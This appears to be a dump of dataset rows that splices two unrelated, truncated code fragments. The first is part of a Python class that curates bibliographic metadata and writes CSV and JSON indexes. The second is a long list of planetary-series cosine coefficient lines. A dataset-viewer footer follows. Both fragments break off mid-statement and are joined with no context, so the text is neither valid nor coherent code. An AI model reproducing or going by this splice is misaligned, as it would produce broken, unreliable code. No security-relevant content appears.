self.armeta[newkey][role].append(tuple((x, new_v)))
def meta_maker(self):
for x in self.brdict:
if "wannabe" in x:
other = x
count = self._add_number(self.br_info_path)
meta = self.prefix + str(count)
self.brmeta[meta] = self.brdict[x]
self.brmeta[meta]["others"].append(other)
self.brmeta[meta]["ids"].append("meta:br/" + meta)
else:
self.brmeta[x] = self.brdict[x]
self.brmeta[x]["ids"].append("meta:br/" + x)
for x in self.radict:
if "wannabe" in x:
other = x
count = self._add_number(self.ra_info_path)
meta = self.prefix + str(count)
self.rameta[meta] = self.radict[x]
self.rameta[meta]["others"].append(other)
self.rameta[meta]["ids"].append("meta:ra/" + meta)
else:
self.rameta[x] = self.radict[x]
self.rameta[x]["ids"].append("meta:ra/" + x)
for x in self.ardict:
if "wannabe" in x:
for w in self.brmeta:
if x in self.brmeta[w]["others"]:
br_key = w
break
else:
br_key = x
self.armeta[br_key] = dict()
self.armeta[br_key]["author"] = list()
self.armeta[br_key]["editor"] = list()
self.armeta[br_key]["publisher"] = list()
self.meta_ar(br_key, x, "author")
self.meta_ar(br_key, x, "editor")
self.meta_ar(br_key, x, "publisher")
def enrich(self):
for row in self.data:
if "wannabe" in row["id"]:
for i in self.brmeta:
if row["id"] in self.brmeta[i]["others"]:
k = i
else:
k = row["id"]
if row["page"] and (k not in self.remeta):
re_meta = self.finder.re_from_meta(k)
if re_meta:
self.remeta[k] = re_meta
row["page"] = re_meta[1]
else:
count = self.prefix + str(self._add_number(self.re_info_path))
page = row["page"].strip().replace("\0", "")
self.remeta[k] = (count, page)
row["page"] = page
elif k in self.remeta:
row["page"] = self.remeta[k][1]
self.ra_update(row, k, "author")
self.ra_update(row, k, "publisher")
self.ra_update(row, k, "editor")
row["id"] = " ".join(self.brmeta[k]["ids"])
row["title"] = self.brmeta[k]["title"]
if row["venue"]:
venue = row["venue"]
if "wannabe" in venue:
for i in self.brmeta:
if venue in self.brmeta[i]["others"]:
ve = i
else:
ve = venue
row["venue"] = self.brmeta[ve]["title"] + " [" + " ".join(self.brmeta[ve]["ids"]) + "]"
@staticmethod
def name_check(ts_name, name):
if "," in ts_name:
names = ts_name.split(",")
if names[0] and not names[1].strip():
# there isn't a given name in ts
if "," in name:
gname = name.split(", ")[1]
if gname.strip():
ts_name = names[0] + ", " + gname
return ts_name
@staticmethod
def clean_name(name):
name = name.replace("\0", "")
if "," in name:
split_name = re.split(r'\s*,\s*', name)
first_name = split_name[1].split()
for pos, w in enumerate(first_name):
first_name[pos] = w.title()
new_first_name = " ".join(first_name)
surname = split_name[0].split()
for pos, w in enumerate(surname):
surname[pos] = w.title()
new_surname = " ".join(surname)
if new_surname:
new_name = new_surname + ", " + new_first_name
else:
new_name = ""
else:
split_name = name.split()
for pos, w in enumerate(split_name):
split_name[pos] = w.capitalize()
new_name = " ".join(split_name)
return new_name
@staticmethod
def clean_title(title):
title = title.replace("\0", "")
if title.isupper():
title = title.lower()
words = title.split()
for pos, w in enumerate(words):
if any(x.isupper() for x in w):
pass
else:
words[pos] = w.title()
newtitle = " ".join(words)
return newtitle
@staticmethod
def _read_number(file_path, line_number=1):
cur_number = 0
try:
with open(file_path) as f:
cur_number = int(f.readlines()[line_number - 1])
except (ValueError, IOError, IndexError):
pass # Do nothing
return cur_number
@staticmethod
def _add_number(file_path, line_number=1):
cur_number = Curator._read_number(file_path, line_number) + 1
if not os.path.exists(os.path.dirname(file_path)):
os.makedirs(os.path.dirname(file_path))
if os.path.exists(file_path):
with open(file_path) as f:
all_lines = f.readlines()
else:
all_lines = []
line_len = len(all_lines)
zero_line_number = line_number - 1
for i in range(line_number):
if i >= line_len:
all_lines += ["\n"]
if i == zero_line_number:
all_lines[i] = str(cur_number) + "\n"
with open(file_path, "w") as f:
f.writelines(all_lines)
return cur_number
@staticmethod
def write_csv(path, datalist):
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path, 'w', newline='', encoding="utf-8") as output_file:
dict_writer = csv.DictWriter(output_file, datalist[0].keys(), delimiter=',', quotechar='"',
quoting=csv.QUOTE_NONNUMERIC)
dict_writer.writeheader()
dict_writer.writerows(datalist)
def indexer(self, path_index, path_csv):
# ID
self.index_id_ra = list()
if self.idra:
for x in self.idra:
row = dict()
row["id"] = str(x)
row["meta"] = str(self.idra[x])
self.index_id_ra.append(row)
else:
row = dict()
row["id"] = ""
row["meta"] = ""
self.index_id_ra.append(row)
self.index_id_br = list()
if self.idbr:
for x in self.idbr:
row = dict()
row["id"] = str(x)
row["meta"] = str(self.idbr[x])
self.index_id_br.append(row)
else:
row = dict()
row["id"] = ""
row["meta"] = ""
self.index_id_br.append(row)
# AR
self.ar_index = list()
if self.armeta:
for x in self.armeta:
index = dict()
index["meta"] = x
for y in self.armeta[x]:
list_ar = list()
for ar, identifier in self.armeta[x][y]:
list_ar.append(str(ar) + ", " + str(identifier))
index[y] = "; ".join(list_ar)
self.ar_index.append(index)
else:
row = dict()
row["meta"] = ""
row["author"] = ""
row["editor"] = ""
row["publisher"] = ""
self.ar_index.append(row)
# RE
self.re_index = list()
if self.remeta:
for x in self.remeta:
r = dict()
r["br"] = x
r["re"] = str(self.remeta[x][0])
self.re_index.append(r)
else:
row = dict()
row["br"] = ""
row["re"] = ""
self.re_index.append(row)
# VI
self.VolIss = dict()
if self.vvi:
for x in self.vvi:
if self.vvi[x]["issue"]:
for iss in self.vvi[x]["issue"]:
if "wannabe" in self.vvi[x]["issue"][iss]["id"]:
for i in self.brmeta:
if self.vvi[x]["issue"][iss]["id"] in self.brmeta[i]["others"]:
self.vvi[x]["issue"][iss]["id"] = str(i)
if self.vvi[x]["volume"]:
for vol in self.vvi[x]["volume"]:
if "wannabe" in self.vvi[x]["volume"][vol]["id"]:
for i in self.brmeta:
if self.vvi[x]["volume"][vol]["id"] in self.brmeta[i]["others"]:
self.vvi[x]["volume"][vol]["id"] = str(i)
if self.vvi[x]["volume"][vol]["issue"]:
for iss in self.vvi[x]["volume"][vol]["issue"]:
if "wannabe" in self.vvi[x]["volume"][vol]["issue"][iss]["id"]:
for i in self.brmeta:
if self.vvi[x]["volume"][vol]["issue"][iss]["id"] in self.brmeta[i]["others"]:
self.vvi[x]["volume"][vol]["issue"][iss]["id"] = str(i)
if "wannabe" in x:
for i in self.brmeta:
if x in self.brmeta[i]["others"]:
self.VolIss[i] = self.vvi[x]
else:
self.VolIss[x] = self.vvi[x]
if self.filename:
ra_path = os.path.join(path_index, "index_id_ra.csv")
self.write_csv(ra_path, self.index_id_ra)
br_path = os.path.join(path_index, "index_id_br.csv")
self.write_csv(br_path, self.index_id_br)
ar_path = os.path.join(path_index, "index_ar.csv")
self.write_csv(ar_path, self.ar_index)
re_path = os.path.join(path_index, "index_re.csv")
self.write_csv(re_path, self.re_index)
vvi_file = os.path.join(path_index, "index_vi.json")
if not os.path.exists(os.path.dirname(vvi_file)):
os.makedirs(os.path.dirname(vvi_file))
with open(vvi_file, 'w') as fp:
json.dump(self.VolIss, fp)
if self.log:
log_file = os.path.join(path_index + "log.json")
with open(log_file, 'w') as lf:
json.dump(self.log, lf)
if self.data:
name = self.filename + ".csv"
data_file = os.path.join(path_csv, name)
self.write_csv(data_file, self.data)
def id_worker(self, col_name, name, idslist, ra_ent=False, br_ent=False, vvi_ent=False, publ_entity=False):
if not ra_ent:
id_dict = self.idbr
entity_dict = self.brdict
idslist, metaval = self.clean_id_list(idslist)
else:
id_dict = self.idra
entity_dict = self.radict
idslist, metaval = self.clean_id_list(idslist, br=False)
# there's meta
if metaval:
# meta already in entity_dict (no care about conflicts, we have a meta specified)
if metaval in entity_dict:
self.find_update_other_ID(idslist, metaval, entity_dict, name)
for identifier in idslist:
if identifier not in entity_dict[metaval]["ids"]:
entity_dict[metaval]["ids"].append(identifier)
if identifier not in id_dict:
count = self._add_number(self.id_info_path)
id_dict[identifier] = self.prefix + str(count)
if not entity_dict[metaval]["title"] and name:
entity_dict[metaval]["title"] = name
else:
found_meta_ts = None
if ra_ent:
found_meta_ts = self.finder.retrieve_ra_from_meta(metaval, | |
* mu.cost(1.25519718278 + 3894.18182954220 * x)
L1 += 0.00000019455 * mu.cost(2.53112676345 + 4399.99435688900 * x)
L1 += 0.00000015000 * mu.cost(1.03464802434 + 2288.34404351140 * x)
L1 += 0.00000020029 * mu.cost(4.73119428749 + 4690.47983635860 * x)
L1 += 0.00000015381 * mu.cost(2.47009470350 + 4535.05943692440 * x)
L1 += 0.00000019964 * mu.cost(5.78652958398 + 7079.37385680780 * x)
L1 += 0.00000015307 * mu.cost(2.26515985343 + 3723.50895892300 * x)
L1 += 0.00000014705 * mu.cost(3.36979890389 + 6681.24210705180 * x)
L1 += 0.00000013535 * mu.cost(2.12334410410 + 5486.77784317500 * x)
L1 += 0.00000012950 * mu.cost(5.61929676688 + 10025.36039844840 * x)
L1 += 0.00000012682 * mu.cost(2.95022113262 + 3496.03282613400 * x)
L1 += 0.00000013644 * mu.cost(1.97739547259 + 5614.72937620960 * x)
L1 += 0.00000013013 * mu.cost(1.51424752315 + 5628.95647021120 * x)
L1 += 0.00000014705 * mu.cost(1.33902715586 + 6681.20759974740 * x)
L1 += 0.00000011353 * mu.cost(6.23438193885 + 135.06508003540 * x)
L1 += 0.00000013275 * mu.cost(3.42243595774 + 5621.84292321040 * x)
L1 += 0.00000010867 * mu.cost(5.28184140482 + 2818.03500860600 * x)
L1 += 0.00000011850 * mu.cost(3.12701832949 + 426.59819087600 * x)
L1 += 0.00000010472 * mu.cost(2.73581537999 + 2787.04302385740 * x)
L1 += 0.00000011132 * mu.cost(5.84178807242 + 2803.80791460440 * x)
L1 += 0.00000011764 * mu.cost(2.58551521265 + 8432.76438481560 * x)
L1 += 0.00000011854 * mu.cost(5.47630686910 + 3553.91152213780 * x)
L1 += 0.00000008490 * mu.cost(1.91378007528 + 11773.37681151540 * x)
L1 += 0.00000009708 * mu.cost(4.52957217749 + 6489.77658728800 * x)
L1 += 0.00000008562 * mu.cost(3.16141186861 + 162.46663613220 * x)
L1 += 0.00000010958 * mu.cost(4.15771850822 + 2388.89402044920 * x)
L1 += 0.00000008133 * mu.cost(1.61295625304 + 2957.71589447660 * x)
L1 += 0.00000008840 * mu.cost(4.23294294197 + 7477.52286021600 * x)
L1 += 0.00000008034 * mu.cost(5.69983564288 + 6041.32756708560 * x)
L1 += 0.00000008344 * mu.cost(2.18273563186 + 23.87843774780 * x)
L1 += 0.00000007696 * mu.cost(5.71877332978 + 9623.68827669120 * x)
L1 += 0.00000008695 * mu.cost(4.43542512603 + 5092.15195811580 * x)
L1 += 0.00000008434 * mu.cost(3.16292250873 + 3347.72597370060 * x)
L1 += 0.00000006664 * mu.cost(5.07517838003 + 8031.09226305840 * x)
L1 += 0.00000008650 * mu.cost(4.33256981793 + 3339.63210563160 * x)
L1 += 0.00000007372 * mu.cost(6.17831593269 + 3583.34103067380 * x)
L1 += 0.00000005726 * mu.cost(3.68120120299 + 8429.24126646660 * x)
L1 += 0.00000006186 * mu.cost(3.54165967734 + 692.15760122680 * x)
L1 += 0.00000005438 * mu.cost(1.05129689580 + 4933.20844033260 * x)
L1 += 0.00000006108 * mu.cost(1.66240879939 + 6525.80445396540 * x)
L1 += 0.00000005154 * mu.cost(1.14703246368 + 28.44918746780 * x)
L1 += 0.00000004850 * mu.cost(5.29254832907 + 6681.29216370240 * x)
L1 += 0.00000005467 * mu.cost(6.12511022569 + 2487.41604494780 * x)
L1 += 0.00000004866 * mu.cost(3.10475368803 + 5.52292430740 * x)
L1 += 0.00000006360 * mu.cost(2.11896608283 + 5884.92684658320 * x)
L1 += 0.00000005223 * mu.cost(0.37446264120 + 12832.75874170460 * x)
L1 += 0.00000004710 * mu.cost(0.23326120326 + 36.02786667740 * x)
L1 += 0.00000004954 * mu.cost(2.44806818502 + 5099.26550511660 * x)
L1 += 0.00000004861 * mu.cost(5.60505298870 + 6467.92575796160 * x)
L1 += 0.00000004706 * mu.cost(0.02998416568 + 7210.91581849420 * x)
L1 += 0.00000004845 * mu.cost(5.70115105957 + 6681.15754309680 * x)
L1 += 0.00000005496 * mu.cost(2.01006612503 + 522.57741809380 * x)
L1 += 0.00000004964 * mu.cost(1.51006845561 + 1744.42598441520 * x)
L1 += 0.00000004443 * mu.cost(0.31208413867 + 10018.31416175040 * x)
L1 += 0.00000005381 * mu.cost(0.18359380473 + 2942.46342329160 * x)
L1 += 0.00000004075 * mu.cost(3.95582108330 + 3.88133535800 * x)
L1 += 0.00000005462 * mu.cost(0.19274227117 + 7632.94325965020 * x)
L1 += 0.00000004110 * mu.cost(1.59535768711 + 7234.79425624200 * x)
L1 += 0.00000004287 * mu.cost(2.87635993968 + 2810.92146160520 * x)
L1 += 0.00000005276 * mu.cost(2.22638595594 + 3127.31333126180 * x)
L1 += 0.00000004450 * mu.cost(4.17005729081 + 2906.90068882300 * x)
L1 += 0.00000005144 * mu.cost(5.66878565669 + 23384.28698689860 * x)
L1 += 0.00000003844 * mu.cost(2.26442183160 + 2699.73481931760 * x)
L1 += 0.00000003514 * mu.cost(1.76463961051 + 1758.65307841680 * x)
L1 += 0.00000003351 * mu.cost(2.66194137496 + 4929.68532198360 * x)
L1 += 0.00000004299 * mu.cost(4.43057446968 + 640.87760738220 * x)
L1 += 0.00000003140 * mu.cost(1.75866226873 + 9595.23908922340 * x)
L1 += 0.00000003716 * mu.cost(2.91969220147 + 15643.68020330980 * x)
L1 += 0.00000003249 * mu.cost(6.13937134379 + 10419.98628350760 * x)
L1 += 0.00000003077 * mu.cost(2.56115174488 + 7064.12138562280 * x)
L1 += 0.00000003208 * mu.cost(2.32519453080 + 5085.03841111500 * x)
L1 += 0.00000002930 * mu.cost(1.27797225349 + 574.34479833480 * x)
L1 += 0.00000002771 * mu.cost(1.75664216142 + 639.89728631400 * x)
L1 += 0.00000003325 * mu.cost(2.58945297384 + 2118.76386037840 * x)
L1 += 0.00000003187 * mu.cost(2.86646751510 + 7740.60678358880 * x)
L1 += 0.00000002780 * mu.cost(0.43157089331 + 5828.02847164760 * x)
L1 += 0.00000002824 * mu.cost(0.98500544471 + 3191.04922956520 * x)
L1 += 0.00000003016 * mu.cost(1.86555882509 + 7.04623669800 * x)
L1 += 0.00000003364 * mu.cost(1.52847138842 + 6674.11130639880 * x)
L1 += 0.00000002672 * mu.cost(3.70855172347 + 10021.85453375160 * x)
L1 += 0.00000002636 * mu.cost(3.11790581052 + 6836.64525283380 * x)
L1 += 0.00000002672 * mu.cost(1.67778079449 + 10021.82002644720 * x)
L1 += 0.00000002563 * mu.cost(3.77294986894 + 2921.12778282460 * x)
L1 += 0.00000002509 * mu.cost(0.30454165124 + 3475.67750673520 * x)
L1 += 0.00000002400 * mu.cost(0.96972421975 + 3319.83703120740 * x)
L1 += 0.00000002262 * mu.cost(2.81394314950 + 7875.67186362420 * x)
L1 += 0.00000002395 * mu.cost(2.96002707485 + 6682.20517446780 * x)
L1 += 0.00000002210 * mu.cost(0.61263930586 + 10973.55568635000 * x)
L1 += 0.00000002248 * mu.cost(4.12382007742 + 59.37386191360 * x)
L1 += 0.00000002426 * mu.cost(5.91508357946 + 5331.35744374080 * x)
L1 += 0.00000002158 * mu.cost(2.17583545077 + 15113.98923821520 * x)
L1 += 0.00000001941 * mu.cost(5.47668312685 + 11371.70468975820 * x)
L1 += 0.00000001903 * mu.cost(5.11165653855 + 1066.49547719000 * x)
L1 += 0.00000002370 * mu.cost(3.87889340214 + 3355.86489788480 * x)
L1 += 0.00000002299 * mu.cost(1.15914205086 + 3320.25710730100 * x)
L1 += 0.00000001944 * mu.cost(5.89081872133 + 6894.52394883760 * x)
L1 += 0.00000001843 * mu.cost(3.07643314617 + 3325.35995551480 * x)
L1 += 0.00000001809 * mu.cost(4.97905218276 + 1648.44675719740 * x)
L1 += 0.00000002136 * mu.cost(1.91364787635 + 8969.56889691100 * x)
L1 += 0.00000002099 * mu.cost(3.00410255642 + 6254.62666252360 * x)
L1 += 0.00000001915 * mu.cost(3.55907431740 + 3767.21061757580 * x)
L1 += 0.00000001991 * mu.cost(5.37274107053 + 206.18554843720 * x)
L1 += 0.00000001685 * mu.cost(5.49701299817 + 266.60704172180 * x)
L1 += 0.00000001646 * mu.cost(1.31923405548 + 3264.34635542420 * x)
L1 += 0.00000001732 * mu.cost(1.81361103995 + 536.80451209540 * x)
L1 += 0.00000001723 * mu.cost(3.25900379342 + 7903.07341972100 * x)
L1 += 0.00000001564 * mu.cost(5.75428852012 + 3360.96774609859 * x)
L1 += 0.00000001589 * mu.cost(1.73273563259 + 3134.42687826260 * x)
L1 += 0.00000001690 * mu.cost(2.43213510013 + 3120.19978426100 * x)
L1 += 0.00000001549 * mu.cost(1.54016426558 + 8425.65083781480 * x)
L1 += 0.00000001536 * mu.cost(5.88431472627 + 20.77539549240 * x)
L1 += 0.00000001460 * mu.cost(4.89733072879 + 9830.38901398780 * x)
L1 += 0.00000002023 * mu.cost(5.94808387002 + 13365.97282514820 * x)
L1 += 0.00000001991 * mu.cost(3.11613326265 + 3361.38782219220 * x)
L1 += 0.00000001401 * mu.cost(2.24482184868 + 3344.20285535160 * x)
L1 += 0.00000001365 * mu.cost(4.58006320751 + 10818.13528691580 * x)
L1 += 0.00000001392 * mu.cost(5.48931017516 + 170.67287061920 * x)
L1 += 0.00000001360 * mu.cost(3.07974035205 + 6127.65545055720 * x)
L1 += 0.00000001345 * mu.cost(1.18653158091 + 14584.29827312060 * x)
L1 += 0.00000001717 * mu.cost(5.62501515015 + 6158.64743530580 * x)
L1 += 0.00000001408 * mu.cost(1.82072980335 + 3337.02199804800 * x)
L1 += 0.00000001736 * mu.cost(2.01921900546 + 10575.40668294180 * x)
L1 += 0.00000001402 * mu.cost(4.50079374387 + 5729.50644714900 * x)
L1 += 0.00000001266 * mu.cost(5.91088435118 + 9808.53818466140 * x)
L1 += 0.00000001433 * mu.cost(6.05024653324 + 12964.30070339100 * x)
L1 += 0.00000001223 * mu.cost(0.82796258263 + 419.48464387520 * x)
L1 += 0.00000001393 * mu.cost(1.05117949107 + 6438.49624942560 * x)
L1 += 0.00000001272 * mu.cost(1.50116723856 + 8439.87793181640 * x)
L1 += 0.00000001143 * mu.cost(4.89747373731 + 220.41264243880 * x)
L1 += 0.00000001183 * mu.cost(3.52587190041 + 6688.33840040040 * x)
L1 += 0.00000001132 * mu.cost(6.19236255633 + 6144.42034130420 * x)
L1 += 0.00000001154 * mu.cost(2.23058485970 + 8955.34180290940 * x)
L1 += 0.00000001129 * mu.cost(3.44264300692 + 10177.25767953360 * x)
L1 += 0.00000001152 * mu.cost(5.29913300616 + 27.40155609680 * x)
L1 += 0.00000001274 * mu.cost(4.58421238440 + 6247.51311552280 * x)
L1 += 0.00000001093 * mu.cost(2.82623332360 + 4569.57454002200 * x)
L1 += 0.00000001303 * mu.cost(0.44350560735 + 87.30820453981 * x)
L1 += 0.00000001335 * mu.cost(2.14204457730 + 11243.68584642080 * x)
L1 += 0.00000001102 * mu.cost(1.96260837539 + 6298.32832117640 * x)
L1 += 0.00000001066 * mu.cost(2.89865914321 + 10404.73381232260 * x)
L1 += 0.00000001027 * mu.cost(4.79269049654 + 3914.95722503460 * x)
L1 += 0.00000001015 * mu.cost(0.22847818730 + 3230.40610548040 * x)
L1 += 0.00000001041 * mu.cost(3.73274497451 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.